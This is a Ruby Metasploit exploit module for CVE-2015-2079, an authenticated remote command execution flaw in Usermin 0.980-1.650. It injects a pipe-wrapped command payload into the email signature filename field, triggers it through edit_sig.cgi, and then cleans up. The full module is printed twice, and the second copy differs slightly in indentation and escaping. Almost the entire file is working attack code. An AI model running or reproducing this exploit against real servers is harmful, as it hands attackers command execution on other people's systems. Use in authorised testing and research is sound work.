datenschrott/usermin-poc.rb

## usermin-poc.rb
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  HttpFingerprint = { :pattern => [ /MiniServ/ ] }

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Usermin 0.980-1.650 Authenticated Arbitrary Command Execution",
      'Description'    => %q{
        This modules exploits a vulnerability found in Usermin, version 0.980 up to
        1.650. As an authenticated user, arbitrary command execution is possible by
        manipulating the filename of an email signature file and triggering a function
        to display the signature.

        Payload hint: cmd/unix/*perl* works best because Usermin is based on Perl :-)
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
         [
           'David Elze < david.elze@code-white.com >' # Discovery & this simple MSF module
         ],
       'References'     =>
         [
           [ 'CVE', '2015-2079' ],
           [ 'URL', 'http://codewhitesec.blogspot.de/2015/05/cve-2015-2079-rce-usermin.html'],
         ],
      'Arch'           => ARCH_CMD,
      'Platform'       => ['unix'],
      'BadChars' => "",
      'Compat'         =>
        {
          'PayloadType' => 'cmd',
          'RequiredCmd' => 'generic perl bash'
        },
      'Targets'        =>
        [
          ['Usermin 0.980-1.650 on Linux', {}],
        ],
      'DisclosureDate' => "Feb 23 2015",
      'DefaultTarget'  => 0,
      'DefaultOptions' =>
        {
           'RPORT' => 20000
        }))

      register_options(
        [
          OptString.new('USERNAME', [ true, 'Usermin username', '']),
          OptString.new('PASSWORD', [ true, 'Usermin password', '']),
          OptString.new('TARGETURI', [true, 'The URI path to Usermin', '/'])
        ], self.class)
  end

  def check
    uri = normalize_uri(target_uri.path)
    uri << '/' if uri[-1, 1] != '/'

    res = send_request_raw({
      'method' => 'GET',
      'uri'    => "#{uri}"
    })

    ver = res.body.scan(/Usermin ([\.0-9]+)/).flatten.first

    if res and is_version_vulnerable?(ver)
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

  def is_version_vulnerable?(ver)
    Gem::Version.new(ver) >= Gem::Version.new('0.980') && Gem::Version.new(ver) <= Gem::Version.new('1.650')
  end

  def exploit
    http_handler = ((datastore['SSL']) ? "https" : "http")
    uri = target_uri.path
    url = "#{http_handler}://#{rhost}:#{rport}#{uri}"

    print_status("Storing the malicious signature filename via uconfig_save.cgi ...")
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(uri, 'uconfig_save.cgi'),
      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
      'headers'   => {
        'Referer' => "#{url}uconfig.cgi?module=mailbox&section=line1"
      },
      'vars_post' => {
         'module' => "mailbox",
         'sig_file' => "free",
         'sig_file_free' => "|" + payload.encoded + "|",
         'sig_mode' => "0",
         'save' => "Save"
      }
    })
    unless res && res.code == 302
      fail_with(Failure::Unknown, "Something strange happened, abort!")
    end

    print_status("Calling the command via mailbox/edit_sig.cgi ...")
    res = send_request_raw({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, 'mailbox/edit_sig.cgi'),
      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
      'headers' => {
        'Referer' => "#{url}left.cgi?mail=1"
      }
    })
    unless res && res.code == 200
      fail_with(Failure::Unknown, "Something strange happened, abort!")
    end

    handler

    print_status("Cleaning up by unsetting the Signature file...")
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(uri, 'uconfig_save.cgi'),
      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
      'headers'   => {
        'Referer' => "#{url}uconfig.cgi?module=mailbox&section=line1"
      },
      'vars_post' => {
         'module' => "mailbox",
         'sig_file' => "*",
         'sig_file_free' => "",
         'sig_mode' => "0",
         'save' => "Save"
      }
    })
    if res && res.code == 302
      print_status("...done.")
    else
      fail_with(Failure::Unknown, "Something strange happened, abort!")
    end
  end
end
	##
	# This module requires Metasploit: http://metasploit.com/download
	# Current source: https://github.com/rapid7/metasploit-framework
	##

	require 'msf/core'

	class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	HttpFingerprint = { :pattern => [ /MiniServ/ ] }

	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
	super(update_info(info,
	'Name' => "Usermin 0.980-1.650 Authenticated Arbitrary Command Execution",
	'Description' => %q{
	This modules exploits a vulnerability found in Usermin, version 0.980 up to
	1.650. As an authenticated user, arbitrary command execution is possible by
	manipulating the filename of an email signature file and triggering a function
	to display the signature.

	Payload hint: cmd/unix/perl works best because Usermin is based on Perl :-)
	},
	'License' => MSF_LICENSE,
	'Author' =>
	[
	'David Elze < david.elze@code-white.com >' # Discovery & this simple MSF module
	],
	'References' =>
	[
	[ 'CVE', '2015-2079' ],
	[ 'URL', 'http://codewhitesec.blogspot.de/2015/05/cve-2015-2079-rce-usermin.html'],
	],
	'Arch' => ARCH_CMD,
	'Platform' => ['unix'],
	'BadChars' => "",
	'Compat' =>
	{
	'PayloadType' => 'cmd',
	'RequiredCmd' => 'generic perl bash'
	},
	'Targets' =>
	[
	['Usermin 0.980-1.650 on Linux', {}],
	],
	'DisclosureDate' => "Feb 23 2015",
	'DefaultTarget' => 0,
	'DefaultOptions' =>
	{
	'RPORT' => 20000
	}))

	register_options(
	[
	OptString.new('USERNAME', [ true, 'Usermin username', '']),
	OptString.new('PASSWORD', [ true, 'Usermin password', '']),
	OptString.new('TARGETURI', [true, 'The URI path to Usermin', '/'])
	], self.class)
	end

	def check
	uri = normalize_uri(target_uri.path)
	uri << '/' if uri[-1, 1] != '/'

	res = send_request_raw({
	'method' => 'GET',
	'uri' => "#{uri}"
	})

	ver = res.body.scan(/Usermin ([\.0-9]+)/).flatten.first

	if res and is_version_vulnerable?(ver)
	return Exploit::CheckCode::Appears
	else
	return Exploit::CheckCode::Safe
	end
	end

	def is_version_vulnerable?(ver)
	Gem::Version.new(ver) >= Gem::Version.new('0.980') && Gem::Version.new(ver) <= Gem::Version.new('1.650')
	end

	def exploit
	http_handler = ((datastore['SSL']) ? "https" : "http")
	uri = target_uri.path
	url = "#{http_handler}://#{rhost}:#{rport}#{uri}"

	print_status("Storing the malicious signature filename via uconfig_save.cgi ...")
	res = send_request_cgi({
	'method' => 'POST',
	'uri' => normalize_uri(uri, 'uconfig_save.cgi'),
	'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
	'headers' => {
	'Referer' => "#{url}uconfig.cgi?module=mailbox&section=line1"
	},
	'vars_post' => {
	'module' => "mailbox",
	'sig_file' => "free",
	'sig_file_free' => "\|" + payload.encoded + "\|",
	'sig_mode' => "0",
	'save' => "Save"
	}
	})
	unless res && res.code == 302
	fail_with(Failure::Unknown, "Something strange happened, abort!")
	end

	print_status("Calling the command via mailbox/edit_sig.cgi ...")
	res = send_request_raw({
	'method' => 'GET',
	'uri' => normalize_uri(uri, 'mailbox/edit_sig.cgi'),
	'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
	'headers' => {
	'Referer' => "#{url}left.cgi?mail=1"
	}
	})
	unless res && res.code == 200
	fail_with(Failure::Unknown, "Something strange happened, abort!")
	end

	handler

	print_status("Cleaning up by unsetting the Signature file...")
	res = send_request_cgi({
	'method' => 'POST',
	'uri' => normalize_uri(uri, 'uconfig_save.cgi'),
	'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
	'headers' => {
	'Referer' => "#{url}uconfig.cgi?module=mailbox&section=line1"
	},
	'vars_post' => {
	'module' => "mailbox",
	'sig_file' => "*",
	'sig_file_free' => "",
	'sig_mode' => "0",
	'save' => "Save"
	}
	})
	if res && res.code == 302
	print_status("...done.")
	else
	fail_with(Failure::Unknown, "Something strange happened, abort!")
	end
	end
	end